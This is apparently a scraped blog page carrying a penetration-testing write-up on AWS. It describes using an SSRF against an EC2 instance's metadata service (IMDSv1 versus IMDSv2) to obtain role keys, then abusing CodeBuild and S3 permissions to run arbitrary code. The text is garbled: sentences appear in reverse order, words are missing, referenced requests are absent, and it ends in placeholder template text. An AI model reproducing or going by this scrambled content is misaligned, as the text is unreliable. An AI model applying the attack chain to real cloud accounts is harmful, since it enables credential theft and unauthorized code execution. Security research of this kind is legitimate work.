Once the AWS Keys have been obtained the first thing you want to do is to understand which privileges are bound to them. Obtain the Key ID, Key Secret, and Session Token for the listed security credentials:.Hopefully for us our target was using the version 1, therefore the following requests were enough to get the AWS keys for the role assigned to the EC2 instance: The difference is quite significant as for IMDSv1 a regular SSRF is enough, while for IMDSv2 you usually need a very powerful SSRF or you must find a Remote Code Execution (RCE). IMDSv2: you should be able to send PUT requests with arbitrary headers to negotiate a token, then attach that token to all the GET requests to the various endpoints to retrieve all the available information.IMDSv1: no specific requirements are in place, by sending GET requests to the endpoints you can retrieve all the available information.This is a very important step because based on its version you would need different requirements to interact with it: The first thing you want to understand when it comes to AWS and SSRF is the version of the Instance Metadata Service (IMDS) in use. Our specific scenario was a web application running on an AWS EC2 instance where we did find a full-read SSRF. A curated list of cloud metadata endpoints for various providers could be found here. This happens because most of cloud providers implement a metadata endpoint which could be reached by all the cloud-based resources to query some information about themself, the project they are part of, and sometimes about their authentication keys. Just want to know how to escalate your privileges? Jump to the exploit! codebuild:StartBuild s3:PutObject Getting the AWS KeysĪs every most of the cloud-related attacks, everything starts with a Server-Side Request Forgery (SSRF). If you have the and the privileges along with a CodeBuild project which reads its configuration from an S3 bucket you have access to, then you can run arbitrary code in the context of the CodeBuild worker. This post is about a privilege escalation vector which we have discovered during a recent assessment and which was not documented. That’s why we - as in Shielder - always try to learn new techniques to assess the security of cloud environments. This means that in 2023 you can’t evaluate the security of a web application without going through a review of its cloud infrastructure as you might miss the elephant in the room. In the last decade one of the most common patterns observed in web applications is their shift to cloud environments.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |